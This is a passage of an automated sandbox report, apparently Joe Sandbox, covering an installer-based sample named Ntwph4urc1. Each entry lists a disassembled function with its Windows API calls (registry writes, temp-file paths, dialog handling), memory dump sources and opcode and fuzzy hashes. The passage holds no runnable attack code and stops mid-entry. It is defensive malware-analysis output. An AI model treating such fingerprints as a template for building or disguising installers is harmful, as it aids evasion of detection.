                                            • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                            • wsprintfW.USER32 ref: 00404C9B
                                            • SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                            • Instruction ID: 3d6b25ca05220dcf043cb3c1ab85a77e0c97cb6522f385c7b59333deb0f41e84
                                            • Opcode Fuzzy Hash: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                            • Instruction Fuzzy Hash: 4811EB736041283BEB00A5AD9D45EDE3688DBC5334F254637FA26F31D1E978C81182E8
                                            Function 00402482 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024CD
                                            • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040250D
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CloseValuelstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp
                                            • API String ID: 2655323295-3523672939
                                            • Opcode ID: 963143206141bdcaaccd5c48088be57f5098dce3fb9d3c4ae02d7804e6155511
                                            • Instruction ID: b5ab21fa5db9dca98c90a3684f9c4c1c94415ceb852b3cd4d8f68548cc0c41e7
                                            • Opcode Fuzzy Hash: 963143206141bdcaaccd5c48088be57f5098dce3fb9d3c4ae02d7804e6155511
                                            • Instruction Fuzzy Hash: D311AF71E00108BEEB00AFA5CE49AAE7BB9EF44314F20443AF514B71D1D6B88D409668
                                            Function 00405DCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                              • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,?,00405DE2,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B20,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405D7C
                                              • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                              • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                            • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B20,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405E24
                                            • GetFileAttributesW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B20,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405E34
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp
                                            • API String ID: 3248276644-289207000
                                            • Opcode ID: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                            • Instruction ID: 3e737dd218ce82e1fa1fef2ae0b63742eeb13cb079fe623d21add3619189c6ea
                                            • Opcode Fuzzy Hash: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                            • Instruction Fuzzy Hash: B2F0A435104E5115D632333A9D09BEF1558CE86718B19863BF8A2B22D2DB3C8A539DBE
                                            Function 00405D6E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,?,00405DE2,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B20,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405D7C
                                            • CharNextW.USER32(00000000), ref: 00405D81
                                            • CharNextW.USER32(00000000), ref: 00405D99
                                            Strings
                                            • C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp, xrefs: 00405D6F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CharNext
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp
                                            • API String ID: 3213498283-3523672939
                                            • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                            • Instruction ID: 839f6a4cd7818f8bbcc29dd9d6e935739f9a8baf6e4a15472bca77c663bd0c43
                                            • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                            • Instruction Fuzzy Hash: 1FF09022920F1296DB3177545C4DE7B5BB8EF54760B00C43BE601B72C1E3B84C818EAA
                                            Function 00405CC3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,0040348F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CC9
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,0040348F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CD3
                                            • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405CE5
                                            Strings
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405CC3
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                            • API String ID: 2659869361-2382934351
                                            • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                            • Instruction ID: 20018de61182ae54b5e078598b4ece42ca391df12eccfc729252e8f5514d5294
                                            • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                            • Instruction Fuzzy Hash: 78D0A731101A30AAD1117B448D04CDF629CFE85304341403BF202B30A2C77C1D5387FD
                                            Function 00402636 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp\System.dll), ref: 0040268D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: lstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp$C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp\System.dll
                                            • API String ID: 1659193697-2002882148
                                            • Opcode ID: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                            • Instruction ID: b6edfc9972aa644188961ebceaa73704b58c28032334693464610e5b401fed5f
                                            • Opcode Fuzzy Hash: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                            • Instruction Fuzzy Hash: CF110D71A10305AACB00ABB08F4AAAE77719F55748F61443FF502F61C1D6FC4951565E
                                            Function 00402FB1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                            Download Yara Rule
                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                            • GetTickCount.KERNEL32 ref: 00402FE2
                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                            • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                            • Instruction ID: 8c281f3aa7e88f802b7d8bba4993e69035ed424970cff038758a163d63a680ad
                                            • Opcode Fuzzy Hash: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                            • Instruction Fuzzy Hash: 3AF0BE30506221ABC2616F60FE0CA8B3B78FB44B51705C83BF101F11E4CB3808819B9D
                                            Function 004053CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 004053F9
                                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040544A
                                              • Part of subcall function 00404390: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                            • Instruction ID: 5f6fd1bc1cb6019f344e496d8f57972e5ce8a9055d244d91c322c77d39ebf2aa
                                            • Opcode Fuzzy Hash: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                            • Instruction Fuzzy Hash: 63018431101608AFEF205F11DD80BDB3725EB95355F508037FA00762E1C77A8C919A6D
                                            Function 004062BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
                                            • RegCloseKey.ADVAPI32(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID: Call
                                            • API String ID: 3356406503-1824292864
                                            • Opcode ID: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
                                            • Instruction ID: 373679b9ec00f947e58de2b720fd419a4882b2706591ab80caa015ae1ce90e84
